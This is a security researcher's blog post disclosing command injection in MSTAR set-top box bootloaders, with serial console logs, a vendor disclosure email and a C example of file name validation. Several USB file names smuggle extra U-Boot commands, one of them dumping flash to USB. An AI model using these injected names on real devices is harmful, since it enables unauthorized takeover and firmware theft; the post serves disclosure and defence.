Ivan Marković
Security consultant and researcher
Long experience in designing and implementing security solutions, mainly oriented toward web, mobile and embedded applications. Author of penetration testing tools recognized by the OWASP organization and the BackTrack Linux distribution. Research work includes the discovery of vulnerabilities in numerous applications and services, for which the author received public acknowledgement from Microsoft.
Command injections via USB upgrade in MSTAR Set-Top box products
27.04.2018
While I was working on a diagnostic device for some of my clients, I found command injections in MSTAR Set-Top box products. The diagnostic device does not specifically target this vendor; we used it during development and for testing. The vulnerable functionality is the automatic USB upgrade process: it is possible to inject additional commands via malicious file names.
For example, to upgrade your Set-Top box, you just need to put the firmware file on a USB drive with the filename "auto_upgrade.bin"; after you insert it and restart the device, it is upgraded automatically. This functionality can also be exploited by inserting additional commands in the filename.
One of the first things I tried is "auto_upgrade.bin;help", and the serial console output confirms that the command injection works:
2017-02-13 18:48:51 U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 18:48:51
2017-02-13 18:48:51 Board: MSTAR KRITI (CPU Speed 576 MHz)
2017-02-13 18:48:51 DRAM: 64 X 0 MBytes
2017-02-13 18:48:51 U-Boot is running at DRAM 0x87610000
2017-02-13 18:48:51 Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL
2017-02-13 18:48:51 Flash is detected (0x0C02, 0xC8, 0x40, 0x16)
2017-02-13 18:48:51 In: serial
2017-02-13 18:48:51 Out: serial
2017-02-13 18:48:51 Err: serial
2017-02-13 18:48:51 MSVC00B000100100208768TH0000000T
2017-02-13 18:48:51 MDrv_PNL_Init u32PnlRiuBaseAddr = BF200000
2017-02-13 18:48:51 MDrv_PNL_Init u32PMRiuBaseAddr = BF000000
2017-02-13 18:48:52 Panel Library mismatch(03), please update to version 04
2017-02-13 18:48:52 [_MDrv_PNL_Init_LPLL][305]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080
2017-02-13 18:48:52 [_MDrv_PNL_Init_LPLL][307]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500
2017-02-13 18:48:52 [_MDrv_PNL_Init_Output_Dclk][350]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080
2017-02-13 18:48:52 [_MDrv_PNL_Init_Output_Dclk][352]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500
2017-02-13 18:48:52 [XC,Version][0;36m 00442327
2017-02-13 18:48:52 [mno need to patch
2017-02-13 18:48:52 DAC eTiming =6
2017-02-13 18:48:52 HDMITx eTiming =7
2017-02-13 18:48:52 HDMITx eTiming =7
2017-02-13 18:48:52 Create Dolby single part name task failed!!
2017-02-13 18:48:52 [Hal_VE_EnableDI][1430] bEnable = 0, bIsDNR2VE = 0
2017-02-13 18:48:52 u32ReadBuffVirAddr = A0000000, u32IntBuffVirAddr = A0100000, u32OutBuffVirAddr = A0730000
2017-02-13 18:48:52 verJPD_SetStatus >>>>>>>>>>> w:720, h:576, p:720
2017-02-13 18:48:52
2017-02-13 18:48:52 [GOP3, PID 0, TID 0x-1][Driver Version]: 0089, BuildNum: 0002, ChangeList: 00524916
2017-02-13 18:48:52 keypad_pressed is [0]
2017-02-13 18:48:52 ir_pressed is [0]
2017-02-13 18:48:52 Hit any key to stop autoboot: 0
2017-02-13 18:48:52 Check USB port[0]:
2017-02-13 18:48:53 Host type:2
2017-02-13 18:48:53 scanning bus for devices... 1 USB Device(s) found
2017-02-13 18:48:53 scanning bus for storage devices... bulk max packet size: ep 200 ep2 200
2017-02-13 18:48:53 usb_stor_Bulk_max_lun: 0
2017-02-13 18:48:53 1 Storage Device(s) found
2017-02-13 18:48:53 reading auto_upgrade.bin
2017-02-13 18:48:53
2017-02-13 18:48:53 ** Unable to read "auto_upgrade.bin" from usb 0:1 **
2017-02-13 18:48:53 cmd fatload usb 0 80000000 auto_upgrade.bin 1 failed
2017-02-13 18:48:53 ? - alias for 'help'
2017-02-13 18:48:53
2017-02-13 18:48:53 do Lzma for compress image
2017-02-13 18:48:53
2017-02-13 18:48:53 autoboot - Continue auto-boot flow
2017-02-13 18:48:53
2017-02-13 18:48:53 base - print or set address offset
2017-02-13 18:48:53
2017-02-13 18:48:53 bdinfo - print Board Info structure
2017-02-13 18:48:53
2017-02-13 18:48:53 boot_logo - Logo display ...
You can also chain your commands:
"auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin"
...
2017-02-13 18:49:57 ustar - update kernal & root file system automatically by script file
2017-02-13 18:49:57
2017-02-13 18:49:57 version - print monitor version
2017-02-13 18:49:57
2017-02-13 18:49:57 boot_params = 0x877958E0
2017-02-13 18:49:57 memstart = 0x80000000
2017-02-13 18:49:57 memsize = 0x08000000
2017-02-13 18:49:57 flashstart = 0xBFC00000
2017-02-13 18:49:57 flashsize = 0x00800000
2017-02-13 18:49:57 flashoffset = 0x00000000
2017-02-13 18:49:57 ethaddr =
2017-02-13 18:49:57 00:00:00:00:00:00
2017-02-13 18:49:57 ip_addr =
2017-02-13 18:49:57 0.0.0.0
2017-02-13 18:49:57
2017-02-13 18:49:57 baudrate = 0 bps
2017-02-13 18:49:57 Usage:
2017-02-13 18:49:57 boot_logo - Logo display
2017-02-13 18:49:57
2017-02-13 18:49:57 List of available devices:
2017-02-13 18:49:57
2017-02-13 18:49:57 serial 80000003 SIO stdin stdout stderr
2017-02-13 18:49:57 usage: fatinfo
2017-02-13 18:49:57 bootdelay=0
2017-02-13 18:49:57 baudrate=115200
2017-02-13 18:49:57 preboot=echo;echo Type "help" for more commands.
2017-02-13 18:49:57 MS_BOARD=BD_MST204A_D01A
2017-02-13 18:49:57 logo_cmd=boot_logo 0 0 1 1
2017-02-13 18:49:57 OAD_IN_MBOOT=1
2017-02-13 18:49:57 info_exchange=spi
2017-02-13 18:49:57 CUSTOMER_OUI=0x226D
2017-02-13 18:49:57 AP_SW_MODEL=0x0208
2017-02-13 18:49:57 HW_MODEL=0x2210
2017-02-13 18:49:57 HW_VERSION=0x0001
2017-02-13 18:49:57 CHIP_VERSION=U03
2017-02-13 18:49:58 BOARD_TYPE_SEL=0x0CFF
2017-02-13 18:49:58 BUILDCL=0xEAF49
2017-02-13 18:49:58 bootcmd=spi_rdc 0x80b00000 0x7001c 0x2ac77e; LzmaDec 0x80b00000 0x2ac77e 0x80000180 0x81000000; go 0x80000224;
2017-02-13 18:49:58 AP_SW_VERSION=0x0001
2017-02-13 18:49:58 usb_complete=0
2017-02-13 18:49:58 filesize=4
2017-02-13 18:49:58 panel_cmd=set_paneltype 12
2017-02-13 18:49:58 OAD_NEED_UPGRADE=0
2017-02-13 18:49:58 OAD_NEED_SCAN=0
2017-02-13 18:49:58 USBUpdateFlag=0
2017-02-13 18:49:58 usb_upgrade=1
2017-02-13 18:49:58 usb_upgrade_port=0
2017-02-13 18:49:58 partno=1
2017-02-13 18:49:58 usb_upgrade_path=auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin
2017-02-13 18:49:58 stdin=serial
2017-02-13 18:49:58 stdout=serial
2017-02-13 18:49:58 stderr=serial
2017-02-13 18:49:58
2017-02-13 18:49:58 Environment size: 703/65532 bytes
2017-02-13 18:49:58
2017-02-13 18:49:58 U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 18:49:58 start get ...
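The console output shows the mechanism: the file name from the USB stick lands in the `usb_upgrade_path` environment variable and is spliced into a `fatload` command line, which the U-Boot interpreter then splits on `;`. Below is an added example in C (not MSTAR's or U-Boot's code) that contrasts that unchecked construction with an allowlist check a bootloader could apply before building the command. The `fatload` line format is taken from the console output above, the `.bin` suffix rule is a hypothetical policy for the example, and `count_commands` is a simplified stand-in for the interpreter's `;` splitting.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Strict allowlist for an upgrade file name: letters, digits, '_', '-', '.'.
 * Separators and substitutions (';', blanks, '$', quotes) are excluded by construction. */
static int safe_name_char(unsigned char c) {
    return isalnum(c) || c == '_' || c == '-' || c == '.';
}

/* Returns 1 if name may be used, 0 otherwise. The ".bin" suffix rule is a
 * hypothetical policy for this example, not something the vendor documents. */
int upgrade_name_is_safe(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64) return 0;
    for (size_t i = 0; i < n; i++)
        if (!safe_name_char((unsigned char)name[i])) return 0;
    return n > 4 && strcmp(name + n - 4, ".bin") == 0;
}

/* Vulnerable pattern suggested by "cmd fatload usb 0 80000000 auto_upgrade.bin 1 failed":
 * the raw name is pasted into a command line the interpreter later splits on ';'. */
int build_fatload_cmd_unchecked(const char *name, char *out, size_t outsz) {
    int r = snprintf(out, outsz, "fatload usb 0 80000000 %s 1", name);
    return (r < 0 || (size_t)r >= outsz) ? -1 : 0;
}

/* Hardened variant: validate first and refuse to build anything otherwise. */
int build_fatload_cmd_checked(const char *name, char *out, size_t outsz) {
    if (!upgrade_name_is_safe(name)) return -1;
    return build_fatload_cmd_unchecked(name, out, outsz);
}

/* Number of commands a ';'-splitting interpreter would run for cmd (quoting ignored). */
int count_commands(const char *cmd) {
    int n = 1;
    for (; *cmd; cmd++) if (*cmd == ';') n++;
    return n;
}

int main(void) {
    char cmd[128];
    const char *name = "auto_upgrade.bin;help"; /* the page's first test name */
    build_fatload_cmd_unchecked(name, cmd, sizeof cmd);
    printf("unchecked: %d command(s): %s\n", count_commands(cmd), cmd);
    printf("checked: %s\n", build_fatload_cmd_checked(name, cmd, sizeof cmd) ? "rejected" : "accepted");
    return 0;
}
```

A more robust fix than sanitising the string is to pass the file name directly to the FAT read routine instead of routing it through the command interpreter at all.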
The serial console doesn't accept any input because "bootdelay=0", but with the command injection in the USB upgrade process we can find a way to configure U-Boot and get root:
2017-02-13 19:11:25 BOOTSPI
2017-02-13 19:11:25 BIST0_OK
2017-02-13 19:11:25 _OK!decomp
2017-02-13 19:11:25 _done
2017-02-13 19:11:25 done
2017-02-13 19:11:25
2017-02-13 19:11:25 Hello U-Boot
2017-02-13 19:11:25
2017-02-13 19:11:25 U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 19:11:25
2017-02-13 19:11:25 Board: MSTAR KRITI (CPU Speed 576 MHz)
2017-02-13 19:11:25 DRAM: 64 X 0 MBytes
2017-02-13 19:11:25 U-Boot is running at DRAM 0x87610000
2017-02-13 19:11:26 Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL
2017-02-13 19:11:26 Flash is detected (0x0C02, 0xC8, 0x40, 0x16)
2017-02-13 19:11:26 In: serial
2017-02-13 19:11:26 Out: serial
2017-02-13 19:11:26 Err: serial
...
2017-02-13 19:11:26 keypad_pressed is [0]
2017-02-13 19:11:26 ir_pressed is [0]
...
2017-02-13 19:11:26 << MStar >># ...
I also tried to contact the vendor about this issue, but I didn't receive a response:
To: contact_europe@mstarsemi.com, security-alert@mstarsemi.com, secure@mstarsemi.com, security@mstarsemi.com, support@mstarsemi.com, info@mstarsemi.com
From: IM
Subject: Command injection in Set-Top Box USB upgrade procedure
Message-ID: <8a9e4502-1963-1bae-3aeb-88e5a16699e4@security-net.biz>
Date: Fri, 27 Oct 2017 15:06:19 +0200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Thunderbird/52.4.0
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 7bit
Content-Language: en-US

Hello,

I'm working on a diagnostic device and during testing I found a command injection in some of your products. It is possible to inject additional commands via malicious file names, for example:

"auto_upgrade.bin;fatwrite usb 0 0xBFC00000 backup.bin 0x400000;"

I will publish these findings in my research paper about the device I'm working on. Please contact me if you want to make a coordinated disclosure or if you need more details.

Best regards,
Ivan Markovic
https://security-net.biz/
You can download a longer serial console dump here: CoolTerm-Capture-2017-02-13.txt
GitHub: Command injections via USB upgrade in MSTAR Set Top box